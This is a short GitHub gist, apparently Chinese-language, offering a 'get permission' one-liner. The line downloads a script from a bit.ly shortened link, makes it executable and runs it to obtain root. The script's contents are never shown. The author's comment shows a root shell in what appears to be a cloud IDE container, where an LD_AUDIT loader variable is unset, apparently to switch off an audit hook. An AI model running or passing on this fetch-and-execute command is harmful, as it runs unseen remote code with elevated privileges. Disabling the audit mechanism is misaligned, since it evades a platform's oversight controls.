Skip to content

Instantly share code, notes, and snippets.

@flufy3d
Created January 13, 2025 16:52
Show Gist options
  • Save flufy3d/80be2884ddfeeddc7d02e7dbd1dc53d4 to your computer and use it in GitHub Desktop.
Save flufy3d/80be2884ddfeeddc7d02e7dbd1dc53d4 to your computer and use it in GitHub Desktop.
【获取权限命令】
【获取权限命令】
wget -O su.sh bit.ly/akuhGet && chmod +x su.sh && ./su.sh
如果没有运行 su.sh
就运行 bash su.sh
@flufy3d
Copy link
Author

flufy3d commented Jan 13, 2025

root@host:/# ls
ERROR: ld.so: object '/usr/lib/librtldloader.so' cannot be loaded as audit interface: cannot open shared object file; ignored.

root@host:/# echo $LD_AUDIT
/usr/lib/librtldloader.so

root@host:/# unset LD_AUDIT
root@host:/# ls
bin cloudide dist home lib64 mnt proc root.sh sbin su.sh

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment